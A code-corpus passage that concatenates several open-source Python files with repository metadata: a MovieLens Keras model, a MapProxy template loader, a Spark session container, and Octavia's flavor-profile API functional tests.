create_channel_normal_user):
cookies = self.get_authn_cookies_user_normal()
channel_id = create_channel_normal_user['ID']
url = self.url + f'/{channel_id}'
r = requests.get(url, cookies=cookies)
assert 200 == r.status_code
assert channel_id == r.json()['ID']
| 41.938776 | 458 | 0.665693 |
4a515836d1175cb1ec0a8c559bb5981b822f8f76 | 3,111 | py | Python | uncertainty_baselines/models/movielens.py | athon-millane/uncertainty-baselines | aa504fc51aac6d4cac47dbd34aa672c670dfbd28 | [
"Apache-2.0"
] | 2 | 2022-02-22T10:22:46.000Z | 2022-03-09T09:22:41.000Z | uncertainty_baselines/models/movielens.py | PGM-Lab/2022-AISTATS-diversity | 63df2e5f29cdaefe49626439bbe13289f37eed36 | [
"Apache-2.0"
] | null | null | null | uncertainty_baselines/models/movielens.py | PGM-Lab/2022-AISTATS-diversity | 63df2e5f29cdaefe49626439bbe13289f37eed36 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# Copyright 2020 The Uncertainty Baselines Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""TF Keras model for an MLP for Criteo, from arxiv.org/abs/1906.02530."""
from typing import Any, Dict, List
import tensorflow as tf
# Model hyperparameters.
_CATEGORICAL_BUCKET_DICT = {
'user_id': 6041,
'movie_id': 3953,
}
_CATEGORICAL_EMBED_DIM = {
'user_id': 8,
'movie_id': 8,
}
_LAYER_SIZES = [50, 20, 10]
def _make_input_layers(batch_size: int) -> Dict[str, tf.keras.layers.Input]:
"""Defines an input layer for tf.keras model with int32 and string dtypes."""
# TODO(chenzhe): Add more user and movie related features as inputs. Currently
# only used movie_id and user_id as the input features.
out = {
'movie_id': tf.keras.layers.Input(
[], batch_size=batch_size, dtype=tf.string, name='movie_id'),
'user_id': tf.keras.layers.Input(
[], batch_size=batch_size, dtype=tf.string, name='user_id')
}
return out
# In order to get better typing we would need to be able to reference the
# FeatureColumn class defined here, but it is not exported:
# https://github.com/tensorflow/tensorflow/blob/v2.1.0/tensorflow/python/feature_column/feature_column_v2.py#L2121.
def _make_feature_columns() -> List[Any]:
"""Build feature_columns for converting features to a dense vector."""
categorical_feature_columns = []
# TODO(chenzhe): Add more user and movie related features as inputs. Currently
# only used movie_id and user_id as the input features.
categorical_feature_arr = ['user_id', 'movie_id']
for name in categorical_feature_arr:
feature_col = tf.feature_column.categorical_column_with_hash_bucket(
name, _CATEGORICAL_BUCKET_DICT[name])
categorical_feature_columns.append(
tf.feature_column.embedding_column(
feature_col, _CATEGORICAL_EMBED_DIM[name]))
return categorical_feature_columns
def create_model(
batch_size: int,
**unused_kwargs: Dict[str, Any]) -> tf.keras.models.Model:
"""Creates a tf.keras.Model fully connected model for MovieLens."""
categorical_feature_columns = _make_feature_columns()
input_layer = _make_input_layers(batch_size)
categorical_features = tf.keras.layers.DenseFeatures(
categorical_feature_columns)(input_layer)
x = tf.keras.layers.BatchNormalization()(categorical_features)
for size in _LAYER_SIZES:
x = tf.keras.layers.Dense(size, activation='relu')(x)
logits = tf.keras.layers.Dense(1)(x)
return tf.keras.models.Model(
inputs=input_layer, outputs=logits, name='movielens_mlp')
| 36.6 | 115 | 0.738669 |
b6009e0f3bf594da238530174d55b94f3f898959 | 1,515 | py | Python | mapproxy/template.py | gongzhengkun/mapproxy | 3c6fd6d61aa95ddcc4e76a9a2b5dcf42f13d9f95 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | mapproxy/template.py | gongzhengkun/mapproxy | 3c6fd6d61aa95ddcc4e76a9a2b5dcf42f13d9f95 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | mapproxy/template.py | gongzhengkun/mapproxy | 3c6fd6d61aa95ddcc4e76a9a2b5dcf42f13d9f95 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # This file is part of the MapProxy project.
# Copyright (C) 2010 Omniscale <http://omniscale.de>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Loading of template files (e.g. capability documents)
"""
import os
import pkg_resources
from mapproxy.util.ext.tempita import Template, bunch
from mapproxy.config.config import base_config
__all__ = ['Template', 'bunch', 'template_loader']
def template_loader(module_name, location='templates', namespace={}):
class loader(object):
def __call__(self, name, from_template=None, default_inherit=None):
if base_config().template_dir:
template_file = os.path.join(base_config().template_dir, name)
else:
template_file = pkg_resources.resource_filename(module_name, location + '/' + name)
return Template.from_filename(template_file, namespace=namespace, encoding='utf-8',
default_inherit=default_inherit, get_template=self)
return loader()
| 39.868421 | 99 | 0.712211 |
300fee021fbfe91811b33498b026b2b0cdb1033f | 2,843 | py | Python | sparklanes/_framework/spark.py | ksbg/sparklanes | 0e5fc04a5de46f070213b64319ea6982e28e16da | [
"MIT"
] | 15 | 2018-06-11T08:08:06.000Z | 2022-03-26T00:11:38.000Z | sparklanes/_framework/spark.py | ksbg/pyspark-etl | 0e5fc04a5de46f070213b64319ea6982e28e16da | [
"MIT"
] | 10 | 2019-01-31T03:37:16.000Z | 2021-06-01T22:29:02.000Z | sparklanes/_framework/spark.py | ksbg/pyspark-etl | 0e5fc04a5de46f070213b64319ea6982e28e16da | [
"MIT"
] | 6 | 2018-07-05T10:00:19.000Z | 2019-10-13T13:40:52.000Z | """Used to allow sharing of SparkContext and SparkSession, to avoid having to "getOrCreate" them
again and again for each task. This way, they can just be imported and used right away."""
# pylint: disable=invalid-name,too-many-arguments
from pyspark import SparkContext, PickleSerializer, BasicProfiler
from pyspark.sql import SparkSession
from six import PY2
from sparklanes._framework.env import INIT_SPARK_ON_IMPORT, SPARK_APP_NAME
class SparkContextAndSessionContainer(object):
"""Container class holding SparkContext and SparkSession instances, so that any changes
will be propagated across the application"""
sc = None
spark = None
def __new__(cls, *args, **kwargs):
if cls is SparkContextAndSessionContainer:
raise TypeError('SparkSession & SparkContext container class may not be instantiated.')
return object.__new__(cls, *args, **kwargs) if PY2 else object.__new__(cls)
@classmethod
def set_sc(cls, master=None, appName=None, sparkHome=None, pyFiles=None, environment=None,
batchSize=0, serializer=PickleSerializer(), conf=None, gateway=None, jsc=None,
profiler_cls=BasicProfiler):
"""Creates and initializes a new `SparkContext` (the old one will be stopped).
Argument signature is copied from `pyspark.SparkContext
<https://spark.apache.org/docs/latest/api/python/pyspark.html#pyspark.SparkContext>`_.
"""
if cls.sc is not None:
cls.sc.stop()
cls.sc = SparkContext(master, appName, sparkHome, pyFiles, environment, batchSize,
serializer,
conf, gateway, jsc, profiler_cls)
cls.__init_spark()
@classmethod
def set_spark(cls, master=None, appName=None, conf=None, hive_support=False):
"""Creates and initializes a new `SparkSession`. Argument signature is copied from
`pyspark.sql.SparkSession
<https://spark.apache.org/docs/latest/api/python/pyspark.sql.html#pyspark.sql.SparkSession>`_.
"""
sess = SparkSession.builder
if master:
sess.master(master)
if appName:
sess.appName(appName)
if conf:
sess.config(conf=conf)
if hive_support:
sess.enableHiveSupport()
cls.spark = sess.getOrCreate()
@classmethod
def init_default(cls):
"""Create and initialize a default SparkContext and SparkSession"""
cls.__init_sc()
cls.__init_spark()
@classmethod
def __init_sc(cls):
cls.sc = SparkContext(appName=SPARK_APP_NAME).getOrCreate()
@classmethod
def __init_spark(cls):
cls.spark = SparkSession.builder.appName(SPARK_APP_NAME).getOrCreate()
if INIT_SPARK_ON_IMPORT:
SparkContextAndSessionContainer.init_default()
| 38.945205 | 102 | 0.679212 |
f9cd1cbf523d65394631a8c524ee17978f942137 | 29,034 | py | Python | octavia/tests/functional/api/v2/test_flavor_profiles.py | mauroseb/octavia | 8f032d884e0f89ac69d5b6e5f5b77d19ee6eb1d7 | [
"Apache-2.0"
] | null | null | null | octavia/tests/functional/api/v2/test_flavor_profiles.py | mauroseb/octavia | 8f032d884e0f89ac69d5b6e5f5b77d19ee6eb1d7 | [
"Apache-2.0"
] | null | null | null | octavia/tests/functional/api/v2/test_flavor_profiles.py | mauroseb/octavia | 8f032d884e0f89ac69d5b6e5f5b77d19ee6eb1d7 | [
"Apache-2.0"
] | null | null | null | # Copyright 2017 Walmart Stores Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from oslo_config import cfg
from oslo_config import fixture as oslo_fixture
from oslo_db import exception as odb_exceptions
from oslo_utils import uuidutils
from octavia.common import constants
import octavia.common.context
from octavia.tests.functional.api.v2 import base
class TestFlavorProfiles(base.BaseAPITest):
root_tag = 'flavorprofile'
root_tag_list = 'flavorprofiles'
root_tag_links = 'flavorprofile_links'
def _assert_request_matches_response(self, req, resp, **optionals):
self.assertTrue(uuidutils.is_uuid_like(resp.get('id')))
self.assertEqual(req.get('name'), resp.get('name'))
self.assertEqual(req.get(constants.PROVIDER_NAME),
resp.get(constants.PROVIDER_NAME))
self.assertEqual(req.get(constants.FLAVOR_DATA),
resp.get(constants.FLAVOR_DATA))
def test_empty_list(self):
response = self.get(self.FPS_PATH)
api_list = response.json.get(self.root_tag_list)
self.assertEqual([], api_list)
def test_create(self):
fp_json = {'name': 'test1', constants.PROVIDER_NAME: 'noop_driver',
constants.FLAVOR_DATA: '{"hello": "world"}'}
body = self._build_body(fp_json)
response = self.post(self.FPS_PATH, body)
api_fp = response.json.get(self.root_tag)
self._assert_request_matches_response(fp_json, api_fp)
def test_create_with_missing_name(self):
fp_json = {constants.PROVIDER_NAME: 'pr1',
constants.FLAVOR_DATA: '{"x": "y"}'}
body = self._build_body(fp_json)
response = self.post(self.FPS_PATH, body, status=400)
err_msg = ("Invalid input for field/attribute name. Value: "
"'None'. Mandatory field missing.")
self.assertEqual(err_msg, response.json.get('faultstring'))
def test_create_with_missing_provider(self):
fp_json = {'name': 'xyz', constants.FLAVOR_DATA: '{"x": "y"}'}
body = self._build_body(fp_json)
response = self.post(self.FPS_PATH, body, status=400)
err_msg = ("Invalid input for field/attribute provider_name. "
"Value: 'None'. Mandatory field missing.")
self.assertEqual(err_msg, response.json.get('faultstring'))
def test_create_with_missing_flavor_data(self):
fp_json = {'name': 'xyz', constants.PROVIDER_NAME: 'pr1'}
body = self._build_body(fp_json)
response = self.post(self.FPS_PATH, body, status=400)
err_msg = ("Invalid input for field/attribute flavor_data. "
"Value: 'None'. Mandatory field missing.")
self.assertEqual(err_msg, response.json.get('faultstring'))
def test_create_with_empty_flavor_data(self):
fp_json = {'name': 'test1', constants.PROVIDER_NAME: 'noop_driver',
constants.FLAVOR_DATA: '{}'}
body = self._build_body(fp_json)
response = self.post(self.FPS_PATH, body)
api_fp = response.json.get(self.root_tag)
self._assert_request_matches_response(fp_json, api_fp)
def test_create_with_long_name(self):
fp_json = {'name': 'n' * 256, constants.PROVIDER_NAME: 'test1',
constants.FLAVOR_DATA: '{"hello": "world"}'}
body = self._build_body(fp_json)
self.post(self.FPS_PATH, body, status=400)
def test_create_with_long_provider(self):
fp_json = {'name': 'name1', constants.PROVIDER_NAME: 'n' * 256,
constants.FLAVOR_DATA: '{"hello": "world"}'}
body = self._build_body(fp_json)
self.post(self.FPS_PATH, body, status=400)
def test_create_with_long_flavor_data(self):
fp_json = {'name': 'name1', constants.PROVIDER_NAME: 'amp',
constants.FLAVOR_DATA: 'n' * 4097}
body = self._build_body(fp_json)
self.post(self.FPS_PATH, body, status=400)
def test_create_authorized(self):
fp_json = {'name': 'test1', constants.PROVIDER_NAME: 'noop_driver',
constants.FLAVOR_DATA: '{"hello": "world"}'}
body = self._build_body(fp_json)
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
project_id = uuidutils.generate_uuid()
with mock.patch.object(octavia.common.context.Context, 'project_id',
project_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': ['load-balancer_member'],
'user_id': None,
'is_admin': True,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': project_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
response = self.post(self.FPS_PATH, body)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
api_fp = response.json.get(self.root_tag)
self._assert_request_matches_response(fp_json, api_fp)
def test_create_not_authorized(self):
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
fp_json = {'name': 'name',
constants.PROVIDER_NAME: 'xyz',
constants.FLAVOR_DATA: '{"x": "y"}'}
body = self._build_body(fp_json)
response = self.post(self.FPS_PATH, body, status=403)
api_fp = response.json
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
self.assertEqual(self.NOT_AUTHORIZED_BODY, api_fp)
def test_create_db_failure(self):
fp_json = {'name': 'test1', constants.PROVIDER_NAME: 'noop_driver',
constants.FLAVOR_DATA: '{"hello": "world"}'}
body = self._build_body(fp_json)
with mock.patch("octavia.db.repositories.FlavorProfileRepository."
"create") as mock_create:
mock_create.side_effect = Exception
self.post(self.FPS_PATH, body, status=500)
mock_create.side_effect = odb_exceptions.DBDuplicateEntry
self.post(self.FPS_PATH, body, status=409)
def test_create_with_invalid_json(self):
fp_json = {'name': 'test1', constants.PROVIDER_NAME: 'noop_driver',
constants.FLAVOR_DATA: '{hello: "world"}'}
body = self._build_body(fp_json)
self.post(self.FPS_PATH, body, status=400)
def test_get(self):
fp = self.create_flavor_profile('name', 'noop_driver',
'{"x": "y"}')
self.assertTrue(uuidutils.is_uuid_like(fp.get('id')))
response = self.get(
self.FP_PATH.format(
fp_id=fp.get('id'))).json.get(self.root_tag)
self.assertEqual('name', response.get('name'))
self.assertEqual(fp.get('id'), response.get('id'))
def test_get_one_deleted_id(self):
response = self.get(self.FP_PATH.format(fp_id=constants.NIL_UUID),
status=404)
self.assertEqual('Flavor profile {} not found.'.format(
constants.NIL_UUID), response.json.get('faultstring'))
def test_get_one_fields_filter(self):
fp = self.create_flavor_profile('name', 'noop_driver',
'{"x": "y"}')
self.assertTrue(uuidutils.is_uuid_like(fp.get('id')))
response = self.get(
self.FP_PATH.format(fp_id=fp.get('id')), params={
'fields': ['id', constants.PROVIDER_NAME]}
).json.get(self.root_tag)
self.assertEqual(fp.get('id'), response.get('id'))
self.assertIn(u'id', response)
self.assertIn(constants.PROVIDER_NAME, response)
self.assertNotIn(u'name', response)
self.assertNotIn(constants.FLAVOR_DATA, response)
def test_get_authorized(self):
fp = self.create_flavor_profile('name', 'noop_driver',
'{"x": "y"}')
self.assertTrue(uuidutils.is_uuid_like(fp.get('id')))
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
project_id = uuidutils.generate_uuid()
with mock.patch.object(octavia.common.context.Context, 'project_id',
project_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': ['load-balancer_member'],
'user_id': None,
'is_admin': True,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': project_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
response = self.get(
self.FP_PATH.format(
fp_id=fp.get('id'))).json.get(self.root_tag)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
self.assertEqual('name', response.get('name'))
self.assertEqual(fp.get('id'), response.get('id'))
def test_get_not_authorized(self):
fp = self.create_flavor_profile('name', 'noop_driver',
'{"x": "y"}')
self.assertTrue(uuidutils.is_uuid_like(fp.get('id')))
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
self.get(self.FP_PATH.format(fp_id=fp.get('id')), status=403)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
def test_get_all(self):
fp1 = self.create_flavor_profile('test1', 'noop_driver',
'{"image": "ubuntu"}')
ref_fp_1 = {u'flavor_data': u'{"image": "ubuntu"}',
u'id': fp1.get('id'), u'name': u'test1',
constants.PROVIDER_NAME: u'noop_driver'}
self.assertTrue(uuidutils.is_uuid_like(fp1.get('id')))
fp2 = self.create_flavor_profile('test2', 'noop_driver-alt',
'{"image": "ubuntu"}')
ref_fp_2 = {u'flavor_data': u'{"image": "ubuntu"}',
u'id': fp2.get('id'), u'name': u'test2',
constants.PROVIDER_NAME: u'noop_driver-alt'}
self.assertTrue(uuidutils.is_uuid_like(fp2.get('id')))
response = self.get(self.FPS_PATH)
api_list = response.json.get(self.root_tag_list)
self.assertEqual(2, len(api_list))
self.assertIn(ref_fp_1, api_list)
self.assertIn(ref_fp_2, api_list)
def test_get_all_fields_filter(self):
fp1 = self.create_flavor_profile('test1', 'noop_driver',
'{"image": "ubuntu"}')
self.assertTrue(uuidutils.is_uuid_like(fp1.get('id')))
fp2 = self.create_flavor_profile('test2', 'noop_driver-alt',
'{"image": "ubuntu"}')
self.assertTrue(uuidutils.is_uuid_like(fp2.get('id')))
response = self.get(self.FPS_PATH, params={
'fields': ['id', 'name']})
api_list = response.json.get(self.root_tag_list)
self.assertEqual(2, len(api_list))
for profile in api_list:
self.assertIn(u'id', profile)
self.assertIn(u'name', profile)
self.assertNotIn(constants.PROVIDER_NAME, profile)
self.assertNotIn(constants.FLAVOR_DATA, profile)
def test_get_all_authorized(self):
fp1 = self.create_flavor_profile('test1', 'noop_driver',
'{"image": "ubuntu"}')
self.assertTrue(uuidutils.is_uuid_like(fp1.get('id')))
fp2 = self.create_flavor_profile('test2', 'noop_driver-alt',
'{"image": "ubuntu"}')
self.assertTrue(uuidutils.is_uuid_like(fp2.get('id')))
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
project_id = uuidutils.generate_uuid()
with mock.patch.object(octavia.common.context.Context, 'project_id',
project_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': ['load-balancer_member'],
'user_id': None,
'is_admin': True,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': project_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
response = self.get(self.FPS_PATH)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
api_list = response.json.get(self.root_tag_list)
self.assertEqual(2, len(api_list))
def test_get_all_not_authorized(self):
fp1 = self.create_flavor_profile('test1', 'noop_driver',
'{"image": "ubuntu"}')
self.assertTrue(uuidutils.is_uuid_like(fp1.get('id')))
fp2 = self.create_flavor_profile('test2', 'noop_driver-alt',
'{"image": "ubuntu"}')
self.assertTrue(uuidutils.is_uuid_like(fp2.get('id')))
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
self.get(self.FPS_PATH, status=403)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
def test_update(self):
fp = self.create_flavor_profile('test_profile', 'noop_driver',
'{"x": "y"}')
update_data = {'name': 'the_profile',
constants.PROVIDER_NAME: 'noop_driver-alt',
constants.FLAVOR_DATA: '{"hello": "world"}'}
body = self._build_body(update_data)
response = self.put(self.FP_PATH.format(fp_id=fp.get('id')), body)
response = self.get(
self.FP_PATH.format(fp_id=fp.get('id'))).json.get(self.root_tag)
self.assertEqual('the_profile', response.get('name'))
self.assertEqual('noop_driver-alt',
response.get(constants.PROVIDER_NAME))
self.assertEqual('{"hello": "world"}',
response.get(constants.FLAVOR_DATA))
def test_update_deleted_id(self):
update_data = {'name': 'fake_profile'}
body = self._build_body(update_data)
response = self.put(self.FP_PATH.format(fp_id=constants.NIL_UUID),
body, status=404)
self.assertEqual('Flavor profile {} not found.'.format(
constants.NIL_UUID), response.json.get('faultstring'))
def test_update_nothing(self):
fp = self.create_flavor_profile('test_profile', 'noop_driver',
'{"x": "y"}')
body = self._build_body({})
response = self.put(self.FP_PATH.format(fp_id=fp.get('id')), body)
response = self.get(
self.FP_PATH.format(fp_id=fp.get('id'))).json.get(self.root_tag)
self.assertEqual('test_profile', response.get('name'))
self.assertEqual('noop_driver', response.get(constants.PROVIDER_NAME))
self.assertEqual('{"x": "y"}',
response.get(constants.FLAVOR_DATA))
def test_update_name_none(self):
self._test_update_param_none(constants.NAME)
def test_update_provider_name_none(self):
self._test_update_param_none(constants.PROVIDER_NAME)
def test_update_flavor_data_none(self):
self._test_update_param_none(constants.FLAVOR_DATA)
def _test_update_param_none(self, param_name):
fp = self.create_flavor_profile('test_profile', 'noop_driver',
'{"x": "y"}')
expect_error_msg = ("None is not a valid option for %s" %
param_name)
body = self._build_body({param_name: None})
response = self.put(self.FP_PATH.format(fp_id=fp.get('id')), body,
status=400)
self.assertEqual(expect_error_msg, response.json['faultstring'])
def test_update_no_flavor_data(self):
fp = self.create_flavor_profile('test_profile', 'noop_driver',
'{"x": "y"}')
update_data = {'name': 'the_profile',
constants.PROVIDER_NAME: 'noop_driver-alt'}
body = self._build_body(update_data)
response = self.put(self.FP_PATH.format(fp_id=fp.get('id')), body)
response = self.get(
self.FP_PATH.format(fp_id=fp.get('id'))).json.get(self.root_tag)
self.assertEqual('the_profile', response.get('name'))
self.assertEqual('noop_driver-alt',
response.get(constants.PROVIDER_NAME))
self.assertEqual('{"x": "y"}', response.get(constants.FLAVOR_DATA))
def test_update_authorized(self):
fp = self.create_flavor_profile('test_profile', 'noop_driver',
'{"x": "y"}')
update_data = {'name': 'the_profile',
constants.PROVIDER_NAME: 'noop_driver-alt',
constants.FLAVOR_DATA: '{"hello": "world"}'}
body = self._build_body(update_data)
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
project_id = uuidutils.generate_uuid()
with mock.patch.object(octavia.common.context.Context, 'project_id',
project_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': ['load-balancer_member'],
'user_id': None,
'is_admin': True,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': project_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
response = self.put(self.FP_PATH.format(fp_id=fp.get('id')),
body)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
response = self.get(
self.FP_PATH.format(fp_id=fp.get('id'))).json.get(self.root_tag)
self.assertEqual('the_profile', response.get('name'))
self.assertEqual('noop_driver-alt',
response.get(constants.PROVIDER_NAME))
self.assertEqual('{"hello": "world"}',
response.get(constants.FLAVOR_DATA))
def test_update_not_authorized(self):
fp = self.create_flavor_profile('test_profile', 'noop_driver',
'{"x": "y"}')
update_data = {'name': 'the_profile', constants.PROVIDER_NAME: 'amp',
constants.FLAVOR_DATA: '{"hello": "world"}'}
body = self._build_body(update_data)
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
response = self.put(self.FP_PATH.format(fp_id=fp.get('id')),
body, status=403)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
response = self.get(
self.FP_PATH.format(fp_id=fp.get('id'))).json.get(self.root_tag)
self.assertEqual('test_profile', response.get('name'))
self.assertEqual('noop_driver', response.get(constants.PROVIDER_NAME))
self.assertEqual('{"x": "y"}',
response.get(constants.FLAVOR_DATA))
def test_update_in_use(self):
fp = self.create_flavor_profile('test_profile', 'noop_driver',
'{"x": "y"}')
self.create_flavor('name1', 'description', fp.get('id'), True)
# Test updating provider while in use is not allowed
update_data = {'name': 'the_profile',
constants.PROVIDER_NAME: 'noop_driver-alt'}
body = self._build_body(update_data)
response = self.put(self.FP_PATH.format(fp_id=fp.get('id')), body,
status=409)
err_msg = ("Flavor profile {} is in use and cannot be "
"modified.".format(fp.get('id')))
self.assertEqual(err_msg, response.json.get('faultstring'))
response = self.get(
self.FP_PATH.format(fp_id=fp.get('id'))).json.get(self.root_tag)
self.assertEqual('test_profile', response.get('name'))
self.assertEqual('noop_driver', response.get(constants.PROVIDER_NAME))
self.assertEqual('{"x": "y"}', response.get(constants.FLAVOR_DATA))
# Test updating flavor data while in use is not allowed
update_data = {'name': 'the_profile',
constants.FLAVOR_DATA: '{"hello": "world"}'}
body = self._build_body(update_data)
response = self.put(self.FP_PATH.format(fp_id=fp.get('id')), body,
status=409)
err_msg = ("Flavor profile {} is in use and cannot be "
"modified.".format(fp.get('id')))
self.assertEqual(err_msg, response.json.get('faultstring'))
response = self.get(
self.FP_PATH.format(fp_id=fp.get('id'))).json.get(self.root_tag)
self.assertEqual('test_profile', response.get('name'))
self.assertEqual('noop_driver', response.get(constants.PROVIDER_NAME))
self.assertEqual('{"x": "y"}', response.get(constants.FLAVOR_DATA))
# Test that you can still update the name when in use
update_data = {'name': 'the_profile'}
body = self._build_body(update_data)
response = self.put(self.FP_PATH.format(fp_id=fp.get('id')), body)
response = self.get(
self.FP_PATH.format(fp_id=fp.get('id'))).json.get(self.root_tag)
self.assertEqual('the_profile', response.get('name'))
self.assertEqual('noop_driver', response.get(constants.PROVIDER_NAME))
self.assertEqual('{"x": "y"}', response.get(constants.FLAVOR_DATA))
def test_delete(self):
fp = self.create_flavor_profile('test1', 'noop_driver',
'{"image": "ubuntu"}')
self.assertTrue(uuidutils.is_uuid_like(fp.get('id')))
self.delete(self.FP_PATH.format(fp_id=fp.get('id')))
response = self.get(self.FP_PATH.format(
fp_id=fp.get('id')), status=404)
err_msg = "Flavor Profile %s not found." % fp.get('id')
self.assertEqual(err_msg, response.json.get('faultstring'))
def test_delete_deleted_id(self):
response = self.delete(self.FP_PATH.format(fp_id=constants.NIL_UUID),
status=404)
self.assertEqual('Flavor profile {} not found.'.format(
constants.NIL_UUID), response.json.get('faultstring'))
def test_delete_nonexistent_id(self):
response = self.delete(self.FP_PATH.format(fp_id='bogus_id'),
status=404)
self.assertEqual('Flavor profile bogus_id not found.',
response.json.get('faultstring'))
def test_delete_authorized(self):
fp = self.create_flavor_profile('test1', 'noop_driver',
'{"image": "ubuntu"}')
self.assertTrue(uuidutils.is_uuid_like(fp.get('id')))
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
project_id = uuidutils.generate_uuid()
with mock.patch.object(octavia.common.context.Context, 'project_id',
project_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': ['load-balancer_member'],
'user_id': None,
'is_admin': True,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': project_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
self.delete(self.FP_PATH.format(fp_id=fp.get('id')))
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
response = self.get(self.FP_PATH.format(
fp_id=fp.get('id')), status=404)
err_msg = "Flavor Profile %s not found." % fp.get('id')
self.assertEqual(err_msg, response.json.get('faultstring'))
def test_delete_not_authorized(self):
fp = self.create_flavor_profile('test1', 'noop_driver',
'{"image": "ubuntu"}')
self.assertTrue(uuidutils.is_uuid_like(fp.get('id')))
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
response = self.delete(self.FP_PATH.format(
fp_id=fp.get('id')), status=403)
api_fp = response.json
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
self.assertEqual(self.NOT_AUTHORIZED_BODY, api_fp)
response = self.get(
self.FP_PATH.format(fp_id=fp.get('id'))).json.get(self.root_tag)
self.assertEqual('test1', response.get('name'))
def test_delete_in_use(self):
fp = self.create_flavor_profile('test1', 'noop_driver',
'{"image": "ubuntu"}')
self.create_flavor('name1', 'description', fp.get('id'), True)
response = self.delete(self.FP_PATH.format(fp_id=fp.get('id')),
status=409)
err_msg = ("Flavor profile {} is in use and cannot be "
"modified.".format(fp.get('id')))
self.assertEqual(err_msg, response.json.get('faultstring'))
response = self.get(
self.FP_PATH.format(fp_id=fp.get('id'))).json.get(self.root_tag)
self.assertEqual('test1', response.get('name'))
| 49.886598 | 79 | 0.597644 |
